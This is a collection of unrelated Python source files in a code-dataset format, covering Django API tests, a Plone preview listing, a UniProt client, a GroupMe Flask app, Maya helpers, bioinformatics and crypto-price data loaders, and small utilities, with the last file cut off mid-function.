self.event_comment.user.get_icon_url,\n 'comment': self.event_comment.comment,\n 'brief_updated_at': self.event_comment.get_brief_updated_at\n }\n self.assertIn(expected_json_dict, list(res.data['results']))\n self.assertEqual(dict(res.data['results'][0]), expected_json_dict)\n\n def test_create_event_comment_for_unauthorized_user(self):\n \"\"\"Test creating a new event comment\"\"\"\n payload = {\n 'comment': 'testcomment',\n }\n url = detail_url(self.event.id)\n res = self.client.post(url, payload)\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n def test_delete_event_comment_for_unauthorized_user(self):\n \"\"\"Test delete an event comment for authenticated user\"\"\"\n url = delete_url(self.event.id, self.event_comment.id)\n res = self.client.delete(url)\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateEventCommentApiTests(TestCase):\n \"\"\"Test the authorized user Event comment API\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n self.organizer = sample_user(\n email='test@matsuda.com',\n password='testpass',\n first_name='test'\n )\n self.comment_user = sample_user(\n email='test2@matsuda.com',\n password='testpass2',\n first_name='testtest'\n )\n self.event = sample_event(self.organizer)\n self.private_event = sample_event(self.organizer)\n self.private_event.status = '0'\n self.private_event.save()\n self.organizer_comment = sample_event_comment(\n self.event, self.organizer)\n self.event_comment = sample_event_comment(\n self.event, self.comment_user)\n self.client.force_authenticate(self.organizer)\n\n def test_create_event_comment_successful(self):\n \"\"\"Test creating a new event comment\"\"\"\n str_comment = 'test_create_event_comment_successful'\n payload = {\n 'comment': str_comment,\n }\n url = detail_url(self.event.id)\n res = self.client.post(url, payload)\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n\n new_event_comment = EventComment.objects.latest('updated_at')\n self.assertEqual(new_event_comment.comment, str_comment)\n\n def test_not_create_event_comment_to_private_event(self):\n \"\"\"Test not creating a new comment to private event\"\"\"\n payload = {\n 'comment': 'testcomment',\n }\n url = detail_url(self.private_event.id)\n res = self.client.post(url, payload)\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_not_create_event_comment_to_deleted_event(self):\n \"\"\"Test not creating a new comment to deleted event\"\"\"\n self.event.delete()\n\n payload = {\n 'comment': 'testcomment',\n }\n url = detail_url(self.event.id)\n res = self.client.post(url, payload)\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_delete_event_comment(self):\n \"\"\"Test delete the event comment by authenticated user\"\"\"\n url = delete_url(self.event.id, self.organizer_comment.id)\n res = self.client.delete(url)\n self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT)\n\n self.organizer_comment.refresh_from_db()\n\n self.assertFalse(self.organizer_comment.is_active)\n\n def test_not_delete_event_comment_for_anyone(self):\n \"\"\"Test not delete an event comment by not suitable user\"\"\"\n url = delete_url(self.event.id, self.event_comment.id)\n res = self.client.delete(url)\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n","sub_path":"src/api/event/tests/test_event_comment_view.py","file_name":"test_event_comment_view.py","file_ext":"py","file_size_in_byte":8932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"167288650","text":"from ftw import bumblebee\nfrom ftw.bumblebee.interfaces import IBumblebeeDocument\nfrom opengever.base.browser.helper import get_css_class\nfrom plone.uuid.interfaces import IUUID\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\n\nclass PreviewListing(object):\n \"\"\"The PreviewListing partial renders previews for a bunch of documents.\n\n Usage:\n - Instantiate with a view, in which this listing is rendered.\n - Use ``.for_objects`` or ``.for_brains`` for defining the documents to\n be displayed.\n - Configure the fetch url with ``.with_fetch_url()``, make sure that\n you setup allowed_attributes on your view when necessary.\n - Maybe configure the batchsize, when needed.\n \"\"\"\n\n listing_template = ViewPageTemplateFile('templates/preview_listing.pt')\n previews_template = ViewPageTemplateFile('templates/previews.pt')\n\n def __init__(self, view):\n \"\"\"Instantiate the preview listing with a view and a published accessor.\n The view should have a publishable attribute for accessing these previews.\n\n :param view: The browser view on whcih this listing is rendered.\n :type view: BrowserView\n \"\"\"\n self.items = None\n self.fetch_url = None\n self.batchsize = 50\n # context and request is required for rendering page templates.\n self.context = view.context\n self.request = view.request\n\n def for_objects(self, objects):\n \"\"\"Setup the preview listing with a list of Plone content objects.\n \"\"\"\n self.items = PreviewListingObjects(objects)\n return self\n\n def for_brains(self, brains):\n \"\"\"Setup the preview listing with a list of catalog brains.\n \"\"\"\n self.items = PreviewListingBrains(brains)\n return self\n\n def with_fetch_url(self, fetch_url):\n \"\"\"Configure the fetch url.\n \"\"\"\n self.fetch_url = fetch_url\n return self\n\n def with_batchsize(self, batchsize):\n \"\"\"Configure the batchsize.\n \"\"\"\n self.batchsize = batchsize\n return self\n\n def render(self):\n \"\"\"Render the items.\n \"\"\"\n assert self.items is not None, \\\n 'No items configured; use .for_objects() or .for_brains().'\n assert self.fetch_url is not None, \\\n 'No fetch_url configured.'\n\n number_of_documents = self.items.get_number_of_documents()\n return self.listing_template(\n available=number_of_documents > 0,\n number_of_documents=number_of_documents,\n fetch_url=self.fetch_url,\n previews_html=self.render_batch(0))\n\n def render_batch(self, first):\n \"\"\"Return the batch to be rendered.\n\n :param first: The index of the first item to return, 0-indexed.\n :type first: int\n \"\"\"\n items = self.items.get_batch(first, self.batchsize)\n if items:\n return self.previews_template(\n previews=map(self.items.get_infos_for, items))\n else:\n # We have to return an empty string if we have no more documents\n # to render. Otherwise plone.protect will log a error-warning:\n # WARNING plone.protect error parsing dom, failure to add csrf\n # token to response.\n return ''\n\n def fetch(self):\n \"\"\"Fetch the next batch.\n \"\"\"\n next_batch_first_index = int(self.request.get('documentPointer', 0))\n self.request.response.setHeader('X-Theme-Disabled', 'True')\n return self.render_batch(next_batch_first_index)\n\n\nclass PreviewListingItems(object):\n \"\"\"PreviewListingItems provides information about the items to be rendered.\n\n The PreviewListingItems is an abstract class, subclassed depending on the\n type of items it holds (plone objects, brains).\n The generic interface is used for providing rendering information about the\n items without the need to normalize the items (e.g. get the object for a\n brain).\n It is implemented so that it can be used in a lazy manner for beeing\n performance friendly.\n \"\"\"\n\n def __init__(self, items):\n self.items = items\n\n def get_batch(self, first, max_amount):\n \"\"\"Slices the current items for rendering a specific batch of items.\n The method may return a generator.\n The method may return less items than ``max_amount``.\n\n :param first: The index of the first item to return, 0-indexed.\n :type first: int\n :param max_amount: The maximum number of items ot return.\n :type maximum: int\n :returns: An iterable with 0 to maximum number of items.\n \"\"\"\n return self.items[first:first + max_amount]\n\n def get_number_of_documents(self):\n \"\"\"Return the total number of documents:\n\n :returns: Total number of documents.\n :rtype: int\n \"\"\"\n return len(self.items)\n\n def get_infos_for(self, item):\n \"\"\"Return the infos for this item as dictionary.\n \"\"\"\n raise NotImplementedError()\n\n\nclass PreviewListingObjects(PreviewListingItems):\n\n def get_infos_for(self, obj):\n return {\n 'title': obj.Title(),\n 'overlay_url': obj.absolute_url() + '/@@bumblebee-overlay-listing',\n 'uid': IUUID(obj),\n 'checksum': IBumblebeeDocument(obj).get_checksum(),\n 'mime_type_css_class': get_css_class(obj),\n 'preview_image_url': bumblebee.get_service_v3().get_representation_url(\n obj, 'thumbnail')}\n\n\nclass PreviewListingBrains(PreviewListingItems):\n\n def get_infos_for(self, brain):\n return {\n 'title': brain.Title,\n 'overlay_url': brain.getURL() + '/@@bumblebee-overlay-listing',\n 'uid': brain.UID,\n 'checksum': brain.bumblebee_checksum,\n 'mime_type_css_class': get_css_class(brain),\n 'preview_image_url': bumblebee.get_service_v3().get_representation_url(\n brain, 'thumbnail')}\n","sub_path":"opengever/bumblebee/browser/preview_listing.py","file_name":"preview_listing.py","file_ext":"py","file_size_in_byte":6008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"251058285","text":"def sum_hourglass(arr, i, j):\n return arr[i][j] + arr[i][j+1] + arr[i][j+2] + arr[i+1][j+1] + arr[i+2][j] + arr[i+2][j+1] + arr[i+2][j+2]\n\n\ndef hourglassSum(arr):\n row_number = len(arr)\n column_number = len(arr[0])\n print(\"arr is a matriz with {row} rows and {column} columns\".format(row=row_number, column=column_number))\n hourglass_number = []\n for i in range(row_number):\n for j in range(column_number):\n if (i + 3) <= column_number and (j + 3) <= row_number:\n total = sum_hourglass(arr, i, j)\n print(\"{}, {} is a hour glass\".format(i, j))\n hourglass_number.append(total)\n print(max(hourglass_number))\n print(max([sum_hourglass(arr, i, j) for i in range(row_number) for j in range(column_number) if (i + 3) <= column_number and (j + 3) <= row_number]))\n\n\nif __name__ == '__main__':\n arr = [\n [1, 1, 1, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [1, 1, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0]\n ]\n hourglassSum(arr)\n","sub_path":"easy_exercises/2d_array.py","file_name":"2d_array.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"344069058","text":"import argparse\nfrom open3d import *\n\ndesp = '''\npcd フォーマットの3次元点群ファイルビューア\n'''\nparser = argparse.ArgumentParser(description=desp)\nparser.add_argument(\"input.pcd\", help='pcd フォーマットの3次元点群ファイル(複数指定可)', nargs='+')\nargs = parser.parse_args()\n\npcds = []\nfor f in vars(args)[\"input.pcd\"]:\n pcd = read_point_cloud(f)\n pcds.append(pcd)\n\ndraw_geometries(pcds)\n\nif len(pcds) > 1:\n for pcd in pcds:\n draw_geometries([pcd])\n\n#vis = Visualizer()\n#vis.create_window()\n#vis.add_geometry(pcds[0])\n#vis.run()\n#vis.destroy_window()\n#vis = Visualizer()\n#vis.create_window()\n#vis.add_geometry(pcds[1])\n#vis.run()\n#vis.destroy_window()\n\n#index = 0\n#def next_pcd(vis):\n# vis.destroy_window()\n# global index\n# index += 1\n# if index >= len(pcds):\n# index -= 1\n# print(index)\n# vis = Visualizer()\n# vis.create_window()\n# vis.add_geometry(pcds[index])\n# vis.run()\n# vis.destroy_window()\n#def prev_pcd(vis):\n# vis.destroy_window()\n# global index\n# index -= 1\n# if index < 0:\n# index = 0\n# print(index)\n# vis = Visualizer()\n# vis.create_window()\n# vis.add_geometry(pcds[index])\n# vis.run()\n# vis.destroy_window()\n#key_to_callback = {}\n#key_to_callback[ord(\"K\")] = next_pcd\n#key_to_callback[ord(\"J\")] = prev_pcd\n#draw_geometries_with_key_callbacks(pcds, key_to_callback)\n\n\n\n","sub_path":"0308_lidar_tools/view_pcd.r02.py","file_name":"view_pcd.r02.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"342169410","text":"from __future__ import division, absolute_import, print_function\nfrom .core import AbstractBatchDataLoader\nimport numpy as np\nfrom avutils import util\nfrom avutils import file_processing as fp\nfrom collections import namedtuple\n\n\nInterval = namedtuple(\"Interval\", [\"chrom\", \"start\", \"stop\", \"labels\"])\n\n\nclass AbstractSeqOnlyDataLoader(AbstractBatchDataLoader):\n\n\n def __init__(self, batch_size,\n rc_augment,\n num_to_load_for_eval,\n wrap_in_keys=None):\n super(AbstractSeqOnlyDataLoader, self).__init__(batch_size=batch_size)\n self.rc_augment = rc_augment\n self.num_to_load_for_eval = num_to_load_for_eval\n self.to_load_for_eval_x = []\n self.to_load_for_eval_y = []\n self.wrap_in_keys = wrap_in_keys\n\n def get_jsonable_object(self):\n the_dict = super(AbstractSeqOnlyDataLoader, self).get_jsonable_object()\n the_dict['rc_augment'] = self.rc_augment\n the_dict['num_to_load_for_eval'] = self.num_to_load_for_eval\n the_dict['wrap_in_keys'] = self.wrap_in_keys\n return the_dict\n\n def get_generator(self, loop_infinitely):\n raise NotImplementedError()\n\n def get_batch_generator(self):\n\n fasta_generator = self.get_generator(loop_infinitely=True)\n\n while True:\n x_batch = []\n y_batch = []\n for i in range(self.batch_size):\n x,y,coor = fasta_generator.next()\n x_batch.append(x)\n y_batch.append(y)\n if (self.rc_augment):\n x_batch.append(x[::-1,::-1])\n y_batch.append(y)\n x_batch = np.array(x_batch)\n y_batch = np.array(y_batch)\n self.to_load_for_eval_x.extend(x_batch)\n self.to_load_for_eval_y.extend(y_batch)\n if (len(self.to_load_for_eval_x) > self.num_to_load_for_eval):\n self.to_load_for_eval_x =\\\n self.to_load_for_eval_x[-self.num_to_load_for_eval:]\n self.to_load_for_eval_y =\\\n self.to_load_for_eval_y[-self.num_to_load_for_eval:]\n\n if (self.wrap_in_keys is not None):\n yield ({self.wrap_in_keys[0]: x_batch},\n {self.wrap_in_keys[1]: y_batch})\n else:\n yield (x_batch, y_batch) \n\n def get_data_for_eval(self):\n if (self.wrap_in_keys is not None):\n return util.enum(\n X={self.wrap_in_keys[0]: np.array(self.to_load_for_eval_x)},\n Y={self.wrap_in_keys[1]: np.array(self.to_load_for_eval_y)})\n else:\n return util.enum(X=np.array(self.to_load_for_eval_x),\n Y=np.array(self.to_load_for_eval_y))\n\n def get_data(self):\n fasta_generator = self.get_generator(loop_infinitely=False)\n X = []\n Y = []\n for (x,y,coor) in fasta_generator:\n X.append(x)\n Y.append(y)\n if (self.wrap_in_keys is not None):\n return util.enum(X={self.wrap_in_keys[0]: np.array(X)},\n Y={self.wrap_in_keys[1]: np.array(Y)})\n else:\n return util.enum(X=np.array(X), Y=np.array(Y))\n\n\nclass SingleStreamSeqOnly(AbstractSeqOnlyDataLoader):\n\n def __init__(self, batch_size,\n bed_source,\n genomelake_data_source,\n rc_augment,\n num_to_load_for_eval,\n randomize_after_pass=True,\n random_seed=1,\n labels_dtype=\"int\",\n wrap_in_keys=None):\n super(SingleStreamSeqOnly, self).__init__(\n batch_size=batch_size,\n rc_augment=rc_augment,\n num_to_load_for_eval=num_to_load_for_eval,\n wrap_in_keys=wrap_in_keys)\n self.bed_source = bed_source\n self.genomelake_data_source = genomelake_data_source\n self.str_labels_dtype = labels_dtype\n self.randomize_after_pass = randomize_after_pass\n self.random_seed = random_seed\n self.labels_dtype=eval(labels_dtype)\n\n def get_jsonable_object(self):\n the_dict = super(SingleStreamSeqOnly, self).get_jsonable_object()\n the_dict['bed_source'] = self.bed_source\n the_dict['genomelake_data_source'] = self.genomelake_data_source\n the_dict['labels_dtype'] = self.str_labels_dtype \n the_dict['randomize_after_pass'] = self.randomize_after_pass\n the_dict['random_seed'] = self.random_seed\n return the_dict\n\n def get_generator(self, loop_infinitely):\n #read bed_source into memory\n bed_fh = fp.get_file_handle(self.bed_source)\n data = []\n print(\"Reading bed file \"+self.bed_source+\" into memory\")\n for a_row in bed_fh:\n a_row = a_row.rstrip().split(\"\\t\")\n data.append(Interval(\n chrom=a_row[0], start=int(a_row[1]), stop=int(a_row[2]),\n labels=[self.labels_dtype(x) for x in a_row[3:]]))\n print(\"Finished reading bed file into memory; got \"\n +str(len(data))+\"rows\")\n if (self.num_to_load_for_eval > len(data)):\n print(\"num_to_load_for_eval is \"+str(self.num_to_load_for_eval)\n +\" but length of data is \"+str(len(data))+\"; adjusting\")\n self.num_to_load_for_eval = len(data)\n random_obj = np.random.RandomState(self.random_seed)\n if (self.randomize_after_pass):\n data = shuffle_array(arr=data, random_obj=random_obj)\n\n #Set up the genomelake extractors\n import genomelake\n import genomelake.extractors\n extractor = genomelake.extractors.ArrayExtractor(\n datafile=self.genomelake_data_source)\n\n idx = 0\n while (idx < len(data)):\n \n to_extract = data[idx:idx+1]\n to_yield = extractor(to_extract)[0]\n yield (to_yield, to_extract[0].labels,\n (to_extract[0].chrom,\n to_extract[0].start,\n to_extract[0].stop))\n\n idx += 1\n if (idx==len(data)):\n if (loop_infinitely):\n if (self.randomize_after_pass):\n data = shuffle_array(arr=data, random_obj=random_obj)\n idx=0\n else:\n raise StopIteration() \n\n\n#randomly shuffles the input array\n#mutates arr!\ndef shuffle_array(arr, random_obj):\n for i in xrange(0,len(arr)-1):\n #randomly select index:\n chosen_index = random_obj.randint(i,len(arr)-1)\n val_at_index = arr[chosen_index]\n arr[chosen_index] = arr[i]\n arr[i] = val_at_index\n return arr\n","sub_path":"momma_dragonn/data_loaders/genomelake_data_loader.py","file_name":"genomelake_data_loader.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"585512142","text":"import os\n\nCLIENT_ID = os.environ['GROUPME_CLIENT_ID']\nACCESS_TOKEN = os.environ['GROUPME_ACCESS_TOKEN']\n\nimport requests, urllib\nfrom flask import Flask, redirect, render_template, request, session, url_for\nimport pandas as pd\n\napp = Flask(__name__)\n\napp.secret_key = os.environ['APP_SECRET_KEY']\n\n@app.route('/')\ndef homepage():\n token = session.get('token')\n if token is None:\n return redirect(url_for('login'))\n return redirect(url_for('groups'))\n\n@app.route('/login')\ndef login():\n return render_template('index.html', auth_url = make_auth_url())\n\ndef make_auth_url():\n params = {\"client_id\": CLIENT_ID}\n url = \"https://oauth.groupme.com/oauth/authorize?\" + urllib.urlencode(params)\n return url\n\n@app.route('/oauth_callback')\ndef oauth_callback():\n token = request.args.get('access_token')\n session['token'] = token\n return redirect(url_for('groups'))\n\n@app.route('/groups')\ndef groups():\n token = session.get('token')\n params = {\"token\": token}\n url = \"https://api.groupme.com/v3/groups?\" + urllib.urlencode(params)\n data = requests.get(url).json()\n groups = [(url_for('visualize', group_id=x['group_id']), x['name'])\n for x in data['response']]\n return render_template('groups.html', groups = groups)\n\ndef get_messages(group_id):\n token = session.get('token')\n msgs_url = \"https://api.groupme.com/v3/groups/%s/messages?\"\n last_id = ''\n msgs = []\n while True:\n if (last_id):\n params = {\"token\": token, \"limit\": 100, \"before_id\": last_id}\n else:\n params = {\"token\": token, \"limit\": 100}\n url = msgs_url % group_id + urllib.urlencode(params)\n r = requests.get(url)\n if (r.status_code == 304):\n break\n data = r.json()\n new_msgs = data[\"response\"][\"messages\"]\n last_id = new_msgs[-1][\"id\"]\n msgs += new_msgs\n return msgs\n\n@app.route('/data/')\ndef data(group_id):\n msgs = get_messages(group_id)\n df = pd.DataFrame(msgs)\n #reformat dataframe here\n return df.to_json()\n\n@app.route('/visualize/')\ndef visualize(group_id):\n return render_template(\"visualize.html\", group_id = group_id)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"238377431","text":"# /usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@File : tosay.py\n@Time : 2020/12/25 21:36:58\n@Author: Morker\n@Blog : https://96.mk/\n@Email : i@96.mk\n\nIf you don't go through the cold, you can't get the fragrant plum blossom.\n'''\n\nimport os\nimport json\nimport time\nimport requests\nfrom config.data import Paths\nfrom config.colors import mkPut\n\n\ndef todaySay():\n # fileTamp = os.path.getctime(Paths.config[0] + 'today.json')\n fileTamp = os.stat(Paths.config[0]+'today.json').st_mtime\n timeArray = time.localtime(fileTamp)\n fileTime = time.strftime(\"%Y%m%d\", timeArray)\n osTime = time.strftime(\"%Y%m%d\", time.localtime())\n if fileTime != osTime:\n try:\n req = requests.get(\n \"https://rest.shanbay.com/api/v2/quote/quotes/today/\", timeout=3)\n except requests.exceptions.ConnectionError:\n print(mkPut.fuchsia(\"[{0}]\".format(time.strftime(\n \"%H:%M:%S\", time.localtime()))), mkPut.yellow(\"[warning]\"), \"更新每日一说超时\")\n with open(Paths.config[0]+'today.json', 'w', encoding=\"utf-8\") as f:\n f.write(req.text)\n\n with open(Paths.config[0]+'today.json', 'r', encoding=\"utf-8\") as f:\n today = json.load(f)\n content = today['data']['content']\n translation = today['data']['translation']\n author = \"--- {0}\".format(today['data']['author'])\n\n todaySays = '''\n{0}\n\n{1}\n\n\\t\\t\\t\\t\\t\\t{2}\n'''.format(content, translation, author)\n return todaySays\n","sub_path":"config/tosay.py","file_name":"tosay.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"148897754","text":"\"\"\"\nuniprot python interface\nto access the uniprot database\n\navailable services:\n map\n retrieve\n\"\"\"\nfrom requests.adapters import HTTPAdapter \nfrom requests.packages.urllib3.util.retry import Retry\nimport requests\nimport sys, argparse\nimport Bio.SeqIO as bpio\nfrom io import StringIO\n\nretry_strategy = Retry(total=3, status_forcelist=[104, 429, 500, 502, 503, 504], \n method_whitelist=[\"HEAD\", \"GET\", \"OPTIONS\", \"POST\"])\nadapter = HTTPAdapter(max_retries=retry_strategy)\nhttp = requests.Session() \nhttp.mount(\"https://\", adapter) \nhttp.mount(\"http://\", adapter)\ndef pfam_from_uniprot(uniprot):\n url_uniprot = f\"https://www.uniprot.org/uniprot/{uniprot}.xml\"\n r = http.get(url_uniprot)\n if r.ok:\n record = bpio.read(StringIO(r.text),\"uniprot-xml\")\n return [x.split(\":\")[1] for x in record.dbxrefs if x.startswith(\"Pfam:\") ]\n raise Exception(f\"error retrieving {uniprot}:{url_uniprot}\\n{r.text}\")\n #url_uniprot = f\"https://www.uniprot.org/uniprot/{uniprot}.xml\"\n #r = requests.get(url_uniprot)\n #if r.ok:\n # record = bpio.read(StringIO(r.text),\"uniprot-xml\")\n # return [x.split(\":\")[1] for x in record.dbxrefs if x.startswith(\"Pfam:\") ]\n #raise Exception(f\"error retrieving {uniprot}:{url_uniprot}\\n{r.text}\")\n\nurl = 'https://www.uniprot.org/'\n\ndef _retrieve(query, format='fasta'):\n \"\"\"_retrieve is not meant for use with the python interface, use `retrieve`\n instead\"\"\"\n \n return _map(query, 'ACC+ID', 'ACC', format=format) \n\ndef retrieve(ids, format='fasta'):\n \"\"\" request entries by uniprot acc using batch retrieval\n\n Args:\n query: list of ids to retrieve\n format: fasta by default\n\n Help:\n possible formats:\n txt, xml, rdf, gff\"\"\"\n if type(ids) is not list:\n ids = [ids]\n return _retrieve(' '.join(ids), format)\n\ndef _map(query, f, t, format='tab'):\n \"\"\" _map is not meant for use with the python interface, use `map` instead\n \"\"\"\n tool = 'uploadlists/'\n\n data = {\n 'from':f,\n 'to':t,\n 'format':format,\n 'query':query\n }\n #response = requests.post(url + tool, data=data)\n response = http.post(url + tool, data=data)\n page = response.text\n return page\n\ndef map(ids, f, t, format='tab'):\n \"\"\" map a list of ids from one format onto another using uniprots mapping api\n \n Args:\n query: id or list of ids to be mapped\n f: from ACC | P_ENTREZGENEID | ...\n t: to ...\n format: tab by default\n\n Help:\n for a list of all possible mappings visit\n 'https://www.uniprot.org/help/api_idmapping'\n \"\"\"\n if type(ids) is not list:\n ids = [ids]\n page = _map(' '.join(ids), f, t, format)\n result = dict()\n for row in page.splitlines()[1:]:\n key, value = row.split('\\t')\n if key in result:\n result[key].add(value)\n else:\n result[key] = set([value])\n return result\n","sub_path":"uniprot.py","file_name":"uniprot.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"455068843","text":"\"\"\"\nAuthor: Jason Labbe\n\nThis class holds generic functions that are geared towards a specific tool, with the idea in mind to be imported from other scripts\nCAUTION: Changing these functions may affect a lot of scripts, so make sure any modifications work!\n\"\"\"\n\nimport maya.cmds as cmds\n\n\nclass GeneralFunctions(object):\n def createCustomAttr(self, obj, longName, defaultValue, shortName=None, keyable=True, lock=False):\n \"\"\"\n Creates a custom attribute.\n Args:\n obj(string): Object to add attribute to.\n longName(string): Attribute's long name.\n defaultValue(typeless): Default value of attribute. The type of this variable determines what kind of attribute will be built.\n shortName(string): Attribute's short name.\n keyable(bool): Make attribute keyable and show up in the channel box.\n lock(bool): Lock attribute.\n \"\"\"\n if shortName is None:\n shortName = longName\n \n # Delete if attribute already exists\n attrExists = cmds.attributeQuery(longName, node=obj, exists=True)\n if attrExists:\n cmds.deleteAttr(\"{0}.{1}\".format(obj, longName) )\n \n # Build command to create attribute\n addAttrOptions = {str:', dt=\"string\"', unicode:', dt=\"string\"', int:', at=\"long\"', float:', at=\"float\"', bool:', at=\"bool\"'}\n attrType = type(defaultValue)\n addOption = addAttrOptions.get(attrType)\n addCommandStr = 'cmds.addAttr(\"{0}\", ln=\"{1}\", sn=\"{2}\", k={3}{4})'.format(obj, longName, shortName, keyable, addOption)\n exec(addCommandStr)\n \n # Set attribute's value\n if attrType == str or attrType == unicode:\n cmds.setAttr(\"{0}.{1}\".format(obj, longName), defaultValue, typ=\"string\", lock=lock)\n else:\n cmds.setAttr(\"{0}.{1}\".format(obj, longName), defaultValue, lock=lock)\n \n def getAttrValue(self, obj, attrName):\n \"\"\"\n Checks if attribute exists then gets its value.\n Args:\n obj(string): Object name\n attrName(string): Attribute name\n Returns:\n Attribute's value, or None if it fails\n \"\"\"\n attrExists = cmds.attributeQuery(attrName, node=obj, exists=True)\n if attrExists:\n attrValue = cmds.getAttr(\"{0}.{1}\".format(obj, attrName) )\n return attrValue\n \n def createWeakReference(self, obj, weakRefObj, attrName):\n \"\"\"\n Connect one object to another via weak reference.\n Args:\n obj(string): Object to hold weak reference.\n weakRefObj(string): Object that will be connected to weak reference attribute.\n attrName(string): Name of attribute.\n \"\"\"\n attrExists = cmds.attributeQuery(attrName, node = obj, exists = True)\n if attrExists:\n cmds.deleteAttr(\"{0}.{1}\".format(obj, attrName) )\n \n cmds.addAttr(obj, ln = attrName, at = \"message\")\n cmds.connectAttr(\"{0}.message\".format(weakRefObj), \"{0}.{1}\".format(obj, attrName) )\n \n def getWeakReferenceObj(self, obj, attrName):\n \"\"\"\n Check's connection of attribute and returns an object used as a weak reference.\n Args:\n obj(string): Object that holds weak reference.\n attrName(string): Name of attribute.\n Returns:\n Weak reference object, None if it fails.\n \"\"\"\n attrExists = cmds.attributeQuery(attrName, node=obj, exists=True)\n if not attrExists:\n return\n \n weakReferences = cmds.listConnections(\"{0}.{1}\".format(obj, attrName) ) or []\n if weakReferences:\n return weakReferences[0]","sub_path":"maya/asset/libs/general_functions.py","file_name":"general_functions.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"140853685","text":"import requests\nimport csv\n\n# get your API key https://app.ioannotator.com/api\nparams= {'apikey': 'add your API key here'}\napi = 'https://api.ioannotator.com/import/texts'\n\n# sample csv can be found here https://github.com/Io-Annotator/Samples/blob/main/python/text/sample.csv\nwith open('./sample.csv') as csvfile:\n rows = csv.DictReader(csvfile, delimiter=';')\n\n for row in rows:\n\n data = {\n 'dataset': '5760835792142336',\n 'text': row['text']}\n\n x = requests.post(api, json = data, params=params)\n print(x)","sub_path":"python/text/import-csv.py","file_name":"import-csv.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"377749665","text":"import pandas as pd\nfrom datetime import datetime\nimport os\nimport numpy as np\nfrom collections import deque\nimport random\n\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten, Dropout, Activation, LSTM, BatchNormalization, TimeDistributed\nfrom tensorflow.keras.callbacks import TensorBoard\n\n# This model will simply guess if the next price will be higher or lower than the current price\nSEQUENCE_LENGTH = 30\nFUTURE_DAY_TO_PREDICT = 1\nFILE_TO_PREDICT = \"BTC\"\n\nTRAIN_PERCENT = .80\n\n# Import and combine data into one dataframe\ndef createMainDf(file):\n dataset = f\"data/{file}.csv\"\n df = pd.read_csv(dataset)\n\n df['Date'] = df['Date'].map(lambda a: convertDate(a)) # Convert Date to Linux Epoch Time\n df.set_index(\"Date\", inplace=True)\n df = df[[\"Close\", \"Volume\"]]\n df = df.astype({f\"Volume\": float})\n df = df.astype({f\"Close\": float})\n\n # Sort by Date\n df.sort_index(inplace=True, ascending=True)\n\n return cleanData(df)\n\n# Convert String Date to Linux Epoch Time\ndef convertDate(date):\n timestamp = datetime.strptime(date, '%Y-%m-%d %I-%p')\n return (timestamp-datetime(1970,1,1)).total_seconds()\n\ndef cleanData(df):\n indices_to_keep = ~df.isin([np.nan, np.inf, -np.inf]).any(1)\n df = df[indices_to_keep].astype(np.float64)\n df.dropna(axis=0, inplace=True)\n df.dropna(axis=1, inplace=True)\n return df\n\n# Classify data as 0 if less than or = existing data or 1 if greater\ndef classify(current, future):\n if float(future) > float(current):\n return 1\n else:\n return 0\n\ndef addTargets(df):\n df['Future'] = df[f\"Close\"].shift(-FUTURE_DAY_TO_PREDICT)\n df['Target'] = list(map(classify, df[f\"Close\"], df[\"Future\"]))\n df = df.drop('Future', 1)\n return cleanData(df)\n\ndef splitTrainAndTest(df):\n dateValues = df.index.values\n last_x_pct = dateValues[-int((1-TRAIN_PERCENT)*len(dateValues))]\n \n train = df[df.index < last_x_pct]\n test = df[df.index >= last_x_pct]\n return train, test\n\ndef normalize(df):\n result = df.copy()\n for feature_name in df.columns:\n max_value = df[feature_name].max()\n min_value = df[feature_name].min()\n result[feature_name] = (df[feature_name] - min_value) / (max_value - min_value)\n result.fillna(0, inplace=True)\n return result\n\ndef getXandY(df):\n df = normalize(df)\n \n sequential_data = []\n previous_days = deque(maxlen=SEQUENCE_LENGTH)\n\n for i in df.values:\n previous_days.append([n for n in i[:-1]])\n if len(previous_days) == SEQUENCE_LENGTH:\n sequential_data.append([np.array(previous_days), i[-1]])\n # Sequential data is of form\n '''\n [\n ex 1:[\n [ [c0, v0], [c1, v1], ... [cn, vn] ],\n target0\n ],\n ex 2: [\n [ [c1, v1], [c2, v2], ... [cn1, vn1] ],\n target1\n ]\n ]\n '''\n 